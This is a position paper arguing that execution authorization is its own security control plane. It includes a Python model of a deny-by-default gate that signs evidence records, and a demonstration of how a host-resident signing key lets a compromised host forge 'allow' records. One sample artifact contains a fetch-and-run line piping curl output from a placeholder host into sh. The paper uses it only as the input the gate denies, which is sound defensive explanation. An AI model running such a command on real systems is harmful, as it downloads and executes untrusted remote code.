A distinct control plane — not a feature. The structural case for why authorizing what executes is becoming its own enforcement primitive, written for analysts mapping the space and builders deciding whether to embed or rebuild.
Zero Trust matured deny-by-default enforcement for identity and network. It never produced an equivalent primitive for execution — what code is actually permitted to run. That gap is structural, widening, and unreachable by advisory tooling. The control that closes it is not a feature of any existing product; it is a separate control plane with its own policy object, its own enforcement point, and its own evidence artifact. That is a category.
Categories emerge when forces make a gap both visible and permanent. Five are converging on execution authorization at once.
Across the Zero Trust pillars, Identity and Network have deny-by-default enforcement primitives. The Applications & Workloads pillar has been served mainly by advisory controls — scanning, inventory, posture — with no equivalent primitive for what executes. The asymmetry is doctrinal, not incidental.
Scanning, SBOM, and posture tools declare intent and surface findings. They cannot, by construction, govern the moment of execution. Declared is not executed — and no amount of better detection collapses that distance. The gap is a different control type, not a maturity level of the same one.
In April 2026, the central vulnerability-enrichment pipeline abandoned universal coverage, citing a multi-year surge in submissions, and marked its backlog as not scheduled for processing. Any defense keyed to that enrichment now carries a growing blind spot it cannot measure, because the unenriched records are exactly the ones it has no signal for. Enforcement that does not depend on known-bad identifiers stops being optional.
Signing and attestation prove who published an artifact and that it has not been modified since. Neither authorizes what that artifact may do at runtime. Provenance is not authorization; signed is not safe. Supply-chain compromise lives precisely in the space those controls leave open: a build poisoned before it was signed passes every provenance check and still runs.
Containerized, autoscaled, and increasingly agent-driven workloads spin up faster than human-paced triage can review. A control that decides at execution time — deterministically, without waiting on a queue — is the only model that matches the operating tempo.
A control plane is not a marketing label. It earns the name when it owns a decision nothing else owns, enforces at a boundary nothing else enforces, and emits evidence nothing else emits. Execution authorization passes all three.
"What may execute, for this workload, now" — a question no scanner, identity, or network control is structured to answer.
A deny-by-default gate at the execution layer — synchronous, before behavior begins, not a post-hoc response.
A verifiable record of each authorization decision — auditable proof that becomes a compliance primitive in its own right.
Emerging enforcement categories tend to resolve into a predictable shape, and the precedent from the network layer is instructive: an open, portable data-plane standard spreads adoption and becomes eligible for mandate, while durable value concentrates in the proprietary enforcement and control built on top — a structure that consistently ends in incumbent consolidation.
Execution authorization is likely to follow it. The evidence format — the portable record of an authorization decision — wants to be an open standard: vendor-neutral, mandate-eligible, adopted everywhere. The enforcement gate and method — the part that actually decides, and whose verdicts must not be forgeable — is where the defensible position sits. The two are separable, and treating them as separable is the strategy.
A host-resident signer is forgeable under host compromise. Any evidence model whose trust root lives on the same host it attests cannot survive the threat it exists to address: whoever owns the host can read the key and mint an "allow" record for a decision the gate never made. The signing root therefore has to sit where the compromised host cannot reach it (a hardware-backed key, a remote signer, or a verifier that checks the gate's own state), which is why the enforcement boundary, not the format, is the hard problem worth owning.
Track execution authorization as a distinct control plane, not a sub-bullet of endpoint or supply-chain tooling. It has its own decision, boundary, and evidence artifact — the markers you use to scope coverage. Folding it into an adjacent category understates a gap that doctrine itself leaves open.
The advisory layers are mature and crowded; the enforcing endpoint is not. Embedding an execution-authorization primitive completes a portfolio that today stops at "we detected it." The integration surface is narrow and well-defined — a policy interface in, a verdict and evidence stream out — so the embed-versus-rebuild question reduces to whether an existing product can satisfy that interface or it must be built.
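The three markers above (a decision, a synchronous deny-by-default boundary, an evidence record per decision), the narrow interface just described (policy in, verdict and evidence out), and the host-resident-signer caveat can be seen together in a small model. The code below is an added example written for this page, not code from any product or project it discusses. The policy object (a per-workload set of sha256 digests), the record fields, the sample artifacts and the key location are all assumptions; HMAC-SHA256 stands in for whatever signer a real gate would use, because the point being demonstrated is where the key lives, not which algorithm signs.

```python
import hashlib
import hmac
import json
import time
from typing import Optional, Tuple

# Constructed sample artifacts standing in for the bytes a workload is about to run.
APPROVED_ARTIFACT = b"#!/bin/sh\necho 'payments-api build 1.4.2'\n"
UNKNOWN_ARTIFACT = b"#!/bin/sh\ncurl -s http://example.invalid/x | sh\n"


def digest(artifact: bytes) -> str:
    """Content identity the policy speaks in: sha256 of the bytes that will execute."""
    return "sha256:" + hashlib.sha256(artifact).hexdigest()


# Hypothetical policy object: workload -> digests permitted to execute there.
# Anything absent is denied; there is no "not yet scanned, probably fine" state.
POLICY = {"payments-api": {digest(APPROVED_ARTIFACT)}}


def policy_digest(policy: dict) -> str:
    """Pins each decision to the exact policy it was made under."""
    canon = {w: sorted(d) for w, d in sorted(policy.items())}
    return "sha256:" + hashlib.sha256(json.dumps(canon, sort_keys=True).encode()).hexdigest()


def authorize(policy: dict, workload: str, artifact: bytes,
              now: Optional[int] = None) -> Tuple[str, dict]:
    """Synchronous deny-by-default gate: decides before anything runs and emits
    one evidence record per decision, for denials as well as allows."""
    art = digest(artifact)
    allowed = art in policy.get(workload, set())
    record = {
        "workload": workload,
        "artifact": art,
        "policy": policy_digest(policy),
        "verdict": "allow" if allowed else "deny",
        "ts": int(time.time()) if now is None else now,
    }
    return record["verdict"], record


def canonical(record: dict) -> bytes:
    """Stable byte form of a record so a signature covers exactly one encoding."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def sign(record: dict, key: bytes) -> str:
    """Evidence signature (HMAC-SHA256 as a stand-in for the gate's real signer)."""
    return hmac.new(key, canonical(record), hashlib.sha256).hexdigest()


def verify(record: dict, sig: str, key: bytes) -> bool:
    return hmac.compare_digest(sign(record, key), sig)


# Assumption for the forgery demonstration: the signing key is a file on the
# same host the gate protects, readable by anyone who has root there.
HOST_RESIDENT_KEY = b"constructed key material that lives on the protected host"


def forge_allow_record(host_key: bytes, policy: dict, workload: str,
                       artifact: bytes, now: int = 0) -> Tuple[dict, str]:
    """What a host compromise buys when the trust root is host-resident: an
    'allow' record for an artifact the policy denies, signed so that it verifies.
    No gate decision was ever made; the evidence simply asserts that one was."""
    record = {
        "workload": workload,
        "artifact": digest(artifact),
        "policy": policy_digest(policy),
        "verdict": "allow",
        "ts": now,
    }
    return record, sign(record, host_key)


if __name__ == "__main__":
    for wl, art in [("payments-api", APPROVED_ARTIFACT),
                    ("payments-api", UNKNOWN_ARTIFACT),
                    ("batch-worker", APPROVED_ARTIFACT)]:
        verdict, rec = authorize(POLICY, wl, art)
        print(wl, verdict, verify(rec, sign(rec, HOST_RESIDENT_KEY), HOST_RESIDENT_KEY))
    forged, fsig = forge_allow_record(HOST_RESIDENT_KEY, POLICY, "payments-api", UNKNOWN_ARTIFACT)
    print("forged record verifies:", verify(forged, fsig, HOST_RESIDENT_KEY))
```

Two things in the model carry the argument. First, the gate has exactly one interface: a policy and the bytes about to run go in, a verdict and a record come out, and an unknown workload or unknown artifact falls through to deny rather than to "no decision". Second, a record signed with a key the host can read is indistinguishable from one the gate actually produced, which is the failure the text describes; swapping HMAC for an asymmetric signature does not change that unless the private key itself moves off the host.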
If execution authorization reads as its own control plane — with a decision, a boundary, and an evidence artifact no adjacent category owns — then the thesis has done its work. Deeper market-structure and integration detail is available to named parties under appropriate terms.